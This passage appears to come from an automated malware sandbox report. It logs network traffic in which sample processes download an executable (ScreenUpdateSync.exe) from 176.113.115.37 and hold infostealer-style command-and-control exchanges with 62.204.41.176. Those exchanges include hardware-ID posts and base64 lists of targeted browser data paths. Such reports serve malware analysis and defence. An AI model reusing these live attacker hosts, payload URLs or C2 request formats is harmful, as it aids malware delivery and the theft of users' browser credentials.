                                                                                                                                  Oct 10, 2024 09:29:14.870397091 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870405912 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870660067 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870748997 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870759964 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870862961 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870872974 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870914936 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870928049 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.870958090 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871042967 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871057034 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871104002 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871113062 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871207952 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871259928 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871273041 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871280909 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871294975 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871306896 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871347904 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871365070 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871422052 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871433973 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871464968 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871515036 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871556997 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871568918 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871611118 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871619940 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871653080 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871695042 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871786118 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:14.871833086 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:15.356278896 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:15.356441021 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:29:16.207715034 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:29:16.212671041 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:16.479151011 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:16.479285002 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:29:16.586817980 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:16.591768026 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:16.591850042 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:16.591953993 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:16.596788883 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297039986 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297064066 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297079086 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297090054 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297101021 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297106028 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:17.297112942 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297122955 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297135115 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297141075 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:17.297148943 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297163963 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.297168016 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:17.297188997 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:17.297220945 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:17.302020073 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.302103996 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.302118063 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.302170038 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:17.424258947 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.424284935 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.424297094 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.424309015 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:17.424479008 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:19.759404898 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:29:19.764179945 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:20.042051077 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:20.042105913 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:29:22.299153090 CEST8049981176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:29:22.299278975 CEST4998180192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:29:24.561393023 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:29:24.563667059 CEST4998180192.168.2.5176.113.115.37

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 10, 2024 09:27:22.729636908 CEST5065853192.168.2.51.1.1.1
                                                                                                                                  Oct 10, 2024 09:27:22.744652033 CEST53506581.1.1.1192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:39.984936953 CEST5144453192.168.2.51.1.1.1
                                                                                                                                  Oct 10, 2024 09:28:40.148279905 CEST53514441.1.1.1192.168.2.5

                                                                                                                                  ICMP Packets

                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                  Oct 10, 2024 09:29:20.930587053 CEST192.168.2.52.2.2.24d5aEcho

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Oct 10, 2024 09:27:22.729636908 CEST192.168.2.51.1.1.10xbb11Standard query (0)tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyyA (IP address)IN (0x0001)false
                                                                                                                                  Oct 10, 2024 09:28:39.984936953 CEST192.168.2.51.1.1.10xe7a0Standard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Oct 10, 2024 09:27:22.744652033 CEST1.1.1.1192.168.2.50xbb11Name error (3)tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyynonenoneA (IP address)IN (0x0001)false
                                                                                                                                  Oct 10, 2024 09:28:40.148279905 CEST1.1.1.1192.168.2.50xe7a0No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                  Oct 10, 2024 09:28:40.148279905 CEST1.1.1.1192.168.2.50xe7a0No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • post-to-me.com
                                                                                                                                  • 176.113.115.37
                                                                                                                                  • 62.204.41.176

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.549979176.113.115.37806412C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 10, 2024 09:28:41.133527040 CEST85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                  User-Agent: ShareScreen
                                                                                                                                  Host: 176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:41.831717968 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:41 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Last-Modified: Thu, 10 Oct 2024 07:15:01 GMT
                                                                                                                                  ETag: "53e00-6241a210243f2"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 343552
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 aa ba 9b 35 ee db f5 66 ee db f5 66 ee db f5 66 f0 89 71 66 f4 db f5 66 f0 89 60 66 fe db f5 66 f0 89 76 66 a4 db f5 66 c9 1d 8e 66 ed db f5 66 ee db f4 66 9f db f5 66 f0 89 7f 66 ef db f5 66 f0 89 61 66 ef db f5 66 f0 89 64 66 ef db f5 66 52 69 63 68 ee db f5 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 71 3f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 03 00 00 dc 0f 00 00 00 00 00 17 12 00 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 a5 78 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$5fffqff`ffvffffffffaffdffRichfPELq?d @&x6( 4 .text `.rdata @@.data|@.@.biwapehB@.tlsF@.mimL@.rsrc P@@
                                                                                                                                  Oct 10, 2024 09:28:41.831737041 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 40 43 00 75 02 f3 c3 e9 12 02 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 53 03 00 00 8b
                                                                                                                                  Data Ascii: ;@CuUQeVEPuuSu9Et-t$M^Ujju]U]U=RCu+uxhYY]jXh`4C3uEP Cj_}MZf9@u8<
                                                                                                                                  Oct 10, 2024 09:28:41.831749916 CEST1236INData Raw: 63 e8 c6 13 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d c8 49 43 00 74 12 8b 0d e4 48 43 00 85 48 70 75 07 e8 46 31 00 00 89 06 8b 46 04 3b 05 e8 47 43 00 74 16 8b 46 08 8b 0d e4 48 43 00 85 48 70 75 08 e8 ba 29 00 00 89 46 04 8b
                                                                                                                                  Data Ascii: cFHlHhN;ICtHCHpuF1F;GCtFHCHpu)FF@puHpF@F^]UVWuMdEu3;t0;u,WWWWW}tE`p39}t}|}$MS}~~EP
                                                                                                                                  Oct 10, 2024 09:28:41.831762075 CEST1236INData Raw: 68 e5 50 00 e8 a3 0c 00 00 59 8b f8 89 7d d8 85 ff 74 78 ff 35 64 e5 50 00 e8 8e 0c 00 00 59 8b f0 89 75 dc 89 7d e4 89 75 e0 83 ee 04 89 75 dc 3b f7 72 57 e8 6a 0c 00 00 39 06 74 ed 3b f7 72 4a ff 36 e8 64 0c 00 00 8b f8 e8 54 0c 00 00 89 06 ff
                                                                                                                                  Data Ascii: hPY}tx5dPYu}uu;rWj9t;rJ6dT5hPN5dPA9}u9Et}}Eu}h!C!C_Yh!C!COYE}u(UCjYu3C}tjY[Ujj
                                                                                                                                  Oct 10, 2024 09:28:41.831774950 CEST1236INData Raw: 75 05 e8 f8 24 00 00 8b 35 78 e5 50 00 85 f6 75 05 be 30 28 43 00 8a 06 3c 20 77 08 84 c0 74 2e 85 ff 74 24 3c 22 75 09 33 c9 85 ff 0f 94 c1 8b f9 0f b6 c0 50 e8 53 33 00 00 59 85 c0 74 01 46 46 eb d3 3c 20 77 07 46 8a 06 84 c0 75 f5 5f 8b c6 5e
                                                                                                                                  Data Ascii: u$5xPu0(C< wt.t$<"u3PS3YtFF< wFu_^=lPu$V5RCW3u<=tGVz1YtujGW3YY=UCt5RCSBVI1C>=Yt1jS3YYtNVSP1t3PPPPP>u
                                                                                                                                  Oct 10, 2024 09:28:41.831789017 CEST1236INData Raw: bc 20 43 00 c7 45 fc fe ff ff ff 6a 40 6a 20 5e 56 e8 8e 2f 00 00 59 59 3b c7 0f 84 14 02 00 00 a3 60 e4 50 00 89 35 4c e4 50 00 8d 88 00 08 00 00 eb 30 c6 40 04 00 83 08 ff c6 40 05 0a 89 78 08 c6 40 24 00 c6 40 25 0a c6 40 26 0a 89 78 38 c6 40
                                                                                                                                  Data Ascii: CEj@j ^V/YY;`P5LP0@@x@$@%@&x8@4@`P;rf9}E;8X;E;|E[j@j /YYtVM`PLP *@@``$@%@&`8@4@;r
                                                                                                                                  Oct 10, 2024 09:28:41.831801891 CEST1236INData Raw: 00 59 c3 8b ff 56 57 ff 15 74 20 43 00 ff 35 90 42 43 00 8b f8 e8 91 fe ff ff ff d0 8b f0 85 f6 75 4e 68 14 02 00 00 6a 01 e8 a2 2a 00 00 8b f0 59 59 85 f6 74 3a 56 ff 35 90 42 43 00 ff 35 14 5a 43 00 e8 e8 fd ff ff 59 ff d0 85 c0 74 18 6a 00 56
                                                                                                                                  Data Ascii: YVWt C5BCuNhj*YYt:V5BC5ZCYtjVYY!CNV)Y3W!C_^VujnY^jh5CuF$tPC)YF,tP5)YF4tP')YF<tP)YF@tP)Y
                                                                                                                                  Oct 10, 2024 09:28:41.831813097 CEST108INData Raw: 00 74 20 68 44 e4 50 00 e8 83 1d 00 00 83 c4 04 85 c0 74 0f 8b 55 08 6a 01 52 ff 15 44 e4 50 00 83 c4 08 8b 4d 0c e8 ff 2a 00 00 8b 45 0c 39 58 0c 74 12 68 04 40 43 00 57 8b d3 8b c8 e8 02 2b 00 00 8b 45 0c 8b 4d f8 89 48 0c 8b 06 83 f8 fe 74 0d
                                                                                                                                  Data Ascii: t hDPtUjRDPM*E9Xth@CW+EMHtN38NV3:
                                                                                                                                  Oct 10, 2024 09:28:41.831825018 CEST1236INData Raw: e2 ff ff 8b 45 f0 8b 48 08 8b d7 e8 95 2a 00 00 ba fe ff ff ff 39 53 0c 0f 84 52 ff ff ff 68 04 40 43 00 57 8b cb e8 ad 2a 00 00 e9 1c ff ff ff 8b ff 55 8b ec 83 ec 10 a1 04 40 43 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb bb 00 00 ff ff 3b
                                                                                                                                  Data Ascii: EH*9SRh@CW*U@CeeSWN@;tt@C`VEP<!Cu3u8!C3!C34!C3EP0!CE3E3;uO@u5@C5@C^_[%@PUE ZC]U(@C3E
                                                                                                                                  Oct 10, 2024 09:28:41.831839085 CEST1236INData Raw: 79 0c 83 c6 fc c1 ef 0f 8b cf 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f0 8b 0e 49 89 4d fc f6 c1 01 0f 85 d3 02 00 00 53 8d 1c 31 8b 13 89 55 f4 8b 56 fc 89 55 f8 8b 55 f4 89 5d 0c f6 c2 01 75 74 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 4b 04
                                                                                                                                  Data Ascii: yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJ
                                                                                                                                  Oct 10, 2024 09:28:41.836831093 CEST1236INData Raw: 83 c6 17 c1 ea 0f 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4f fc 83 e6 f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d fc 0f 8e 55 01 00 00 f6 c3 01 0f 85 45 01 00 00 03 d9 3b f3 0f 8f 3b 01 00 00 8b 4d fc c1 f9 04 49 89 4d f8 83 f9
                                                                                                                                  Data Ascii: iDMOI;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.54998062.204.41.176806020C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 10, 2024 09:28:54.465965033 CEST88OUTGET / HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:28:55.157658100 CEST203INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:55 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:28:55.200732946 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 219
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 39 35 36 36 34 45 39 41 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="hwid"A995664E9A092653764225------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="build"default7_cap------ECBAEBGHDAECBGDGCAKE--
                                                                                                                                  Oct 10, 2024 09:28:56.088943958 CEST395INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:55 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 168
                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 4f 44 45 78 59 6a 41 78 5a 54 6b 35 4f 47 59 77 4e 7a 41 77 4d 7a 42 6d 4e 54 45 34 4e 44 6b 77 59 54 6c 6b 4d 7a 4d 77 4e 44 55 34 4e 32 55 31 4f 47 49 34 4e 54 4e 69 4e 6a 67 77 5a 57 5a 6d 4e 6d 56 68 5a 54 4d 34 5a 44 5a 68 5a 6d 4d 79 5a 44 45 33 4e 32 52 6c 59 7a 6b 30 4e 47 49 30 66 48 4a 6f 5a 58 52 71 63 6d 56 6c 66 47 64 79 5a 57 68 71 5a 58 4a 6e 63 69 35 77 64 32 52 38 4d 58 77 77 66 44 46 38 4d 48 77 77 66 44 42 38 4d 48 77 78 66 44 42 38 64 47 74 71 64 32 56 6d 64 32 56 6c 66 41 3d 3d
                                                                                                                                  Data Ascii: ODExYjAxZTk5OGYwNzAwMzBmNTE4NDkwYTlkMzMwNDU4N2U1OGI4NTNiNjgwZWZmNmVhZTM4ZDZhZmMyZDE3N2RlYzk0NGI0fHJoZXRqcmVlfGdyZWhqZXJnci5wd2R8MXwwfDF8MHwwfDB8MHwxfDB8dGtqd2Vmd2VlfA==
                                                                                                                                  Oct 10, 2024 09:28:56.091892958 CEST468OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 268
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"browsers------EGDGIIJJECFIDHJJKKFC--
                                                                                                                                  Oct 10, 2024 09:28:56.314738989 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:56 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 1520
                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                  Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                  Oct 10, 2024 09:28:56.315362930 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                  Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
